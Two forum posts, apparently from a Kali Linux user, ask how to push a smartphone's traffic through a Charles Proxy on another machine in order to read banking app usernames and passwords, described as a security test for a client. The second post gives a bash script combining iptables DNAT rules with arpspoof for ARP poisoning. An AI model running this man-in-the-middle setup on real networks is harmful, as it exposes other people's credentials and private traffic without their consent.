How to redirect requests through a proxy on a different machine?
My setup is the following:
- Smartphone (= client = victim)
- Laptop with Kali Linux
- iMac with Charles Proxy installed
If I set the iMac's IP and port 8888 in the WLAN-configuration on the iPhone, everything is redirected through the Charles Proxy and I can read username/password of a banking app (it's a client I'd like to prove the security hole).
How can I achieve the same behaviour with Kali but without setting the proxy in the iPhone configuration? Is it possible to tell all the clients in the network (except the iMac) to send their traffic through the iMacs IP with port 8888?
Thanks a lot!
How to achieve the same behavior as setting a proxy in the client's settings?
Hi,
if I'm setting the HTTP-Proxy in my iPhone's WLAN-Settings to the IP and Port of my Charles-Proxy, everything works as expected and I can see the traffic of my e-banking app.
But with the following script on my Kali-Linux I get an SSL-error:
Code:
#!/bin/bash
iptables -t nat --flush
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.11:8888
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 10.0.0.11:8888
iptables -t nat -A POSTROUTING -j MASQUERADE
arpspoof -i wlan0 -t [IP-OF-IPHONE] [IP-OF-GATEWAY]
arpspoof -i wlan0 -t [IP-OF-GATEWAY] [IP-OF-KALI]
What am I missing? Shouldn't it be possible to achieve the exact same behavior?
Thanks a lot!
